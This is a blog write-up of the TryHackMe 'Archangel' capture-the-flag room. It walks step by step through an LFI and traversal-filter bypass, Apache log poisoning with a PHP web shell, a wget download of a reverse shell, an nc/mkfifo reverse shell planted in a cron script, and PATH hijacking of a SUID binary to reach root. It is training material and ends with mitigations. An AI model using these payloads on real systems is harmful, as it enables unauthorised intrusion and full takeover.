Archangel Write-up

Description

Archangel is a boot2root CTF on TryHackMe. A well known security solutions company seems to be doing some testing on their live machine. Best time to exploit it.

Enumeration

First of all, we have to determine which services are running on the target machine. For this reason we will start a Nmap scan with the following command sudo nmap -p- $TARGET_IP:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 15:53 EST
Nmap scan report for localhost ($TARGET_IP)
Host is up (0.080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 116.07 seconds

As you can see the target is running SSH on port 22 and a web server on port 80. We can now check out the website.

Website

On the website we can check the HTTP headers. Just open the developer console and navigate to the “Network” tab. We can determine through the HTTP header that Apache 2.4.29 is running. The target is a Ubuntu machine.

HTTP header of the response

On the website we can determine a domain for the server. It is used as a domain for the Email address.

Domain name

You can now add that domain to your /etc/hosts file. Finally you should be able to navigate to that domain. You will see a “under development” page and the first flag.

First Flag

Next we can check if a “robots.txt” file exists. Luckily for us there is one. The “robots.txt” file contains the path “/test.php”.

robots.txt file

On the “/test.php” path there is a button. This button will include another site.

test.php

We can click on that button and see a new text. Additionally the URL changes.

After clicking on the button

We can now test for a LFI vulnerability. The parameter “view” is prone to LFI. We can now read the source code of the “test.php” file:

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php 
Base64 encoded source code of test.php

This will return the source code of “test.php” in base64 encoded data. We can easily decode it with CyberChef or with bash and the command echo <source code> | base64 -d > test.php. You can now open the file in a text editor. This will reveal the filter and another flag.

Source code of test.php

We can easily bypass that filter by using “.././..” instead of “../..”. The following command bypasses the filter and displays the “/etc/passwd” file:

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../etc/passwd
/etc/passwd of the target machine

We can also test if we can access the Apache access logs. The following URL will get the access logs successfully.

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log

Initial Access

With that knowledge we can now perform log poisoning to get a reverse shell. Start burp suite and intercept a request. Place the PHP command <?php system($_GET['cmd']); ?> inside the “User-Agent” field.

Performing log poisoning

Now we can inject shell commands and get the output inside the access log. An example requests for the id command:

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log&cmd=id
id command

Initial Access

We can now use this simple web shell to upload a reverse shell. I have used the PHP reverse shell of Pentestmonkey. Host a web server with that shell on your machine and inject a wget command to download the reverse shell.

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log&cmd=wget%20http://$YOUR_IP_AND_PORT/s.php

After starting a netcat listener on your host with the command nc -lvnp 1234, you can navigate to the URL “ “http://mafialive.thm/test.php?view=/var/www/html/development_testing/s.php"” and get a reverse shell.

listening on [any] 1234 ...
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
03:27:09 up 1:06, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Next drop into a TTY shell with the following Python command:

python3 -c "import pty; pty.spawn('/bin/bash')"

Finally you can read the user flag with the command cat /home/archangel/user.txt.

Enumeration

During enumeration we can spot that the archangel user is running a cronjob every minute.

/etc/crontab

We can write into the “helloworld.sh” script.

helloworld.sh script permissions

Privilege Escalation to the archangel user

Now we can again start a netcat listener on the attacker machine. After that we can place a netcat reverse shell inside the “helloworld.sh” script to gain a shell as archangel.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $MACHINE_IP 1234 >/tmp/f" >> helloworld.sh
Reverse shell as archangel

Now we can read the second flag, which is placed inside the “secret” directory of the archangel user.

Second user flag

Inside the “secret” directory there is a binary called “backup”. This binary has the SUID bit set. Running strings against the binary reveals, that it runs cp /home/user/archangel/myfiles/* /opt/backupfiles.

Privilege Escalation to root

The “backup” binary can be abused to escalated our privileges. Run the following commands. Create a file called “cp” with touch cp. Next run the following commands to make it run bash:

echo '#!/bin/bash' >> cp
echo '/bin/bash' >> cp

After that change your “PATH” variable to contain the current folder first.

export PATH="/home/archangel/secret:$PATH"

Finally you can run the “backup” binary: ./backup. After running the “backup” binary we should be root and able to read the root flag:

Escalated privileges to root

Mitigation

Never deploy anything that is under development on a live machine. Also the filter should be hardened. Furthermore the “helloworld.sh” script should only be writable by the owner. The backup binary should use absolute paths, instead of just calling cp.

--

--

--

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Crypto Cards Reward System Adjustment

How Netflix Works, Explained

How to create TOR proxy with Python (Cheat sheet 101)

{UPDATE} Lip Art 3D Hack Free Resources Generator

{UPDATE} 索菲亞醫生遊戲:孩子們最喜歡的遊戲 Hack Free Resources Generator

Buying Memory Foam Mattresses: Elements to ThinkAbout https://t.co/u9UC6IwYrS

{UPDATE} Hoppia Tale Hack Free Resources Generator

OSCP Exam Attempt #1

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rabbit

Rabbit

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

More from Medium

Ollie {THM}

Writeup — ‘Kill L’

Screenshot — 1

Throwback — Part 8 — Emails

TryHackMe — Ice